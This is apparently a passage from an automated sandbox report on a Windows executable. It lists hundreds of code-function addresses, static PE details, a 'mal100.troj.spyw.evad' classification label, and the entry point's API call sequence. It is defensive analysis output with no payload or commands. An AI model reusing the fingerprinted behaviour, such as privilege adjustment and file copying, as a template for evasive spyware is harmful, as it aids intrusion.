Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB0D48	2_2_3AFB0D48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB8748	2_2_3AFB8748
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBFB48	2_2_3AFBFB48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBDB48	2_2_3AFBDB48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB0D38	2_2_3AFB0D38
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB8738	2_2_3AFB8738
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBFB38	2_2_3AFBFB38
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB5720	2_2_3AFB5720
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBC918	2_2_3AFBC918
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB3D10	2_2_3AFB3D10
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB5710	2_2_3AFB5710
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBE908	2_2_3AFBE908
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB3D0F	2_2_3AFB3D0F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFB2300	2_2_3AFB2300
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFBC907	2_2_3AFBC907
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD70C0	2_2_3AFD70C0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFDD710	2_2_3AFDD710
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD5AE0	2_2_3AFD5AE0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD28E0	2_2_3AFD28E0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD3EC0	2_2_3AFD3EC0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD0CC0	2_2_3AFD0CC0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD94B8	2_2_3AFD94B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD3EB4	2_2_3AFD3EB4
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD54A0	2_2_3AFD54A0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD22A0	2_2_3AFD22A0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD3880	2_2_3AFD3880
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD0680	2_2_3AFD0680
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD6A80	2_2_3AFD6A80
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD6A71	2_2_3AFD6A71
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD4E60	2_2_3AFD4E60
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD1C60	2_2_3AFD1C60
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD6440	2_2_3AFD6440
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD3240	2_2_3AFD3240
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD0040	2_2_3AFD0040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFDEE38	2_2_3AFDEE38
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD6430	2_2_3AFD6430
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD4820	2_2_3AFD4820
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD1620	2_2_3AFD1620
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD5E00	2_2_3AFD5E00
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD2C00	2_2_3AFD2C00
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD41E0	2_2_3AFD41E0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD0FE0	2_2_3AFD0FE0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD57C0	2_2_3AFD57C0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD25C0	2_2_3AFD25C0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD6DA0	2_2_3AFD6DA0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD3BA0	2_2_3AFD3BA0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD09A0	2_2_3AFD09A0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD5180	2_2_3AFD5180
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD1F80	2_2_3AFD1F80
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD6760	2_2_3AFD6760
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD3560	2_2_3AFD3560
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD0360	2_2_3AFD0360
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD4B40	2_2_3AFD4B40
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD1940	2_2_3AFD1940
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD6120	2_2_3AFD6120
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD2F20	2_2_3AFD2F20
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD4500	2_2_3AFD4500
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFD1300	2_2_3AFD1300
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE3FE8	2_2_3AFE3FE8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE61E8	2_2_3AFE61E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE9FFF	2_2_3AFE9FFF
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE1FF8	2_2_3AFE1FF8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEB7F8	2_2_3AFEB7F8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE48F7	2_2_3AFE48F7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE74F7	2_2_3AFE74F7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE0DF0	2_2_3AFE0DF0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE8CF0	2_2_3AFE8CF0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEE2EF	2_2_3AFEE2EF
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEB7EA	2_2_3AFEB7EA
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEFAE8	2_2_3AFEFAE8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE1FE8	2_2_3AFE1FE8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFECFE0	2_2_3AFECFE0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE8CE0	2_2_3AFE8CE0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE0DDF	2_2_3AFE0DDF
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEFADF	2_2_3AFEFADF
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEA4D8	2_2_3AFEA4D8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE61D8	2_2_3AFE61D8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE3FD9	2_2_3AFE3FD9
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE04D0	2_2_3AFE04D0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE79D0	2_2_3AFE79D0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFECFCF	2_2_3AFECFCF
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE36C8	2_2_3AFE36C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEE7C8	2_2_3AFEE7C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEA4C8	2_2_3AFEA4C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEBCC0	2_2_3AFEBCC0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE79C0	2_2_3AFE79C0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE04BF	2_2_3AFE04BF
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE56B8	2_2_3AFE56B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE91B8	2_2_3AFE91B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE36B8	2_2_3AFE36B8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEE7B9	2_2_3AFEE7B9
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE66B0	2_2_3AFE66B0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEBCB0	2_2_3AFEBCB0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE91AA	2_2_3AFE91AA
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE2DA8	2_2_3AFE2DA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFED4A8	2_2_3AFED4A8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE56A8	2_2_3AFE56A8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEA9A0	2_2_3AFEA9A0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE66A0	2_2_3AFE66A0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE2D9A	2_2_3AFE2D9A
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE4D98	2_2_3AFE4D98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE7E98	2_2_3AFE7E98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFED498	2_2_3AFED498
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEEC90	2_2_3AFEEC90
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEA990	2_2_3AFEA990
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE2488	2_2_3AFE2488
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEC188	2_2_3AFEC188
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE4D89	2_2_3AFE4D89
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE7E87	2_2_3AFE7E87
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEEC84	2_2_3AFEEC84
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE1280	2_2_3AFE1280
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE9680	2_2_3AFE9680
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE247A	2_2_3AFE247A
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE4478	2_2_3AFE4478
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE6B78	2_2_3AFE6B78
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEC178	2_2_3AFEC178
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFED970	2_2_3AFED970
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE1271	2_2_3AFE1271
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE966F	2_2_3AFE966F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE6B6A	2_2_3AFE6B6A
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE1B68	2_2_3AFE1B68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEAE68	2_2_3AFEAE68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE4469	2_2_3AFE4469
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE0960	2_2_3AFE0960
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE8360	2_2_3AFE8360
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFED95F	2_2_3AFED95F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE3B58	2_2_3AFE3B58
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEF158	2_2_3AFEF158
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE1B58	2_2_3AFE1B58
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEAE59	2_2_3AFEAE59
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEC650	2_2_3AFEC650
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE8350	2_2_3AFE8350
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEF150	2_2_3AFEF150
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE094F	2_2_3AFE094F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE5B48	2_2_3AFE5B48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE9B48	2_2_3AFE9B48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE3B47	2_2_3AFE3B47
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE9B42	2_2_3AFE9B42
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE0040	2_2_3AFE0040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE7040	2_2_3AFE7040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEC640	2_2_3AFEC640
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE3238	2_2_3AFE3238
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEDE38	2_2_3AFEDE38
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE5B37	2_2_3AFE5B37
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE7032	2_2_3AFE7032
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEB330	2_2_3AFEB330
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE5228	2_2_3AFE5228
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE8828	2_2_3AFE8828
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE3228	2_2_3AFE3228
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEDE28	2_2_3AFEDE28
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEB322	2_2_3AFEB322
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEF620	2_2_3AFEF620
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE2918	2_2_3AFE2918
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFECB18	2_2_3AFECB18
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE5218	2_2_3AFE5218
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE8818	2_2_3AFE8818
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFECB12	2_2_3AFECB12
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE1710	2_2_3AFE1710
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEA010	2_2_3AFEA010
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEF60F	2_2_3AFEF60F
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE4908	2_2_3AFE4908
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE7508	2_2_3AFE7508
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE0007	2_2_3AFE0007
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE2907	2_2_3AFE2907
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFEE300	2_2_3AFEE300
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3AFE1700	2_2_3AFE1700
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00F988	2_2_3B00F988
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B007FA8	2_2_3B007FA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B001828	2_2_3B001828
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00F668	2_2_3B00F668
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00ED08	2_2_3B00ED08
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B000508	2_2_3B000508
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B008908	2_2_3B008908
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00BB08	2_2_3B00BB08
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B003123	2_2_3B003123
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00D728	2_2_3B00D728
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00A528	2_2_3B00A528
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B008F48	2_2_3B008F48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00F348	2_2_3B00F348
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00C148	2_2_3B00C148
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00135B	2_2_3B00135B
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B001360	2_2_3B001360
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00AB68	2_2_3B00AB68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00DD68	2_2_3B00DD68
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00C788	2_2_3B00C788
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B009588	2_2_3B009588
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00E3A8	2_2_3B00E3A8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00B1A8	2_2_3B00B1A8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0009C7	2_2_3B0009C7
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B009BC8	2_2_3B009BC8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00CDC8	2_2_3B00CDC8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0009D0	2_2_3B0009D0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00B7E8	2_2_3B00B7E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0085E8	2_2_3B0085E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00E9E8	2_2_3B00E9E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00D408	2_2_3B00D408
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00A208	2_2_3B00A208
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B002C15	2_2_3B002C15
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B001817	2_2_3B001817
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00F028	2_2_3B00F028
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B008C28	2_2_3B008C28
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00BE28	2_2_3B00BE28
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B000039	2_2_3B000039
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B000040	2_2_3B000040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00A848	2_2_3B00A848
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00DA48	2_2_3B00DA48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B009268	2_2_3B009268
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00C468	2_2_3B00C468
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B000E88	2_2_3B000E88
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00E088	2_2_3B00E088
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00AE88	2_2_3B00AE88
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B000E98	2_2_3B000E98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B002E98	2_2_3B002E98
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00FCA8	2_2_3B00FCA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00CAA8	2_2_3B00CAA8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0098A8	2_2_3B0098A8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00B4C8	2_2_3B00B4C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0082C8	2_2_3B0082C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00E6C8	2_2_3B00E6C8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B009EE8	2_2_3B009EE8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B00D0E8	2_2_3B00D0E8
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0004FB	2_2_3B0004FB
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B041C50	2_2_3B041C50
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B043108	2_2_3B043108
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0437F0	2_2_3B0437F0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B041530	2_2_3B041530
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B042A20	2_2_3B042A20
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0448DE	2_2_3B0448DE
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B040E48	2_2_3B040E48
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B042338	2_2_3B042338
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B041C41	2_2_3B041C41
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0430FB	2_2_3B0430FB
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B0437E1	2_2_3B0437E1
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B041521	2_2_3B041521
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B042A13	2_2_3B042A13
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B040AC4	2_2_3B040AC4
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B040AD0	2_2_3B040AD0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B040E38	2_2_3B040E38
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B042328	2_2_3B042328
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B040006	2_2_3B040006
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B040040	2_2_3B040040
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B6BB510	2_2_3B6BB510
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B6B5CB0	2_2_3B6B5CB0
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B6B1BE4	2_2_3B6B1BE4
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_3B6B4A18	2_2_3B6B4A18

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

Code function: String function: 00402C41 appears 51 times

Source: 4kobC6KGC3.exe

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: 4kobC6KGC3.exe, 00000002.00000002.54536035054.0000000037D57000.00000004.00000010.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 4kobC6KGC3.exe

Source: 4kobC6KGC3.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/14@5/5

Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403359
Source: C:\Users\user\Desktop\4kobC6KGC3.exe	Code function: 2_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_00403359

Source: C:\Users\user\Desktop\4kobC6KGC3.exe

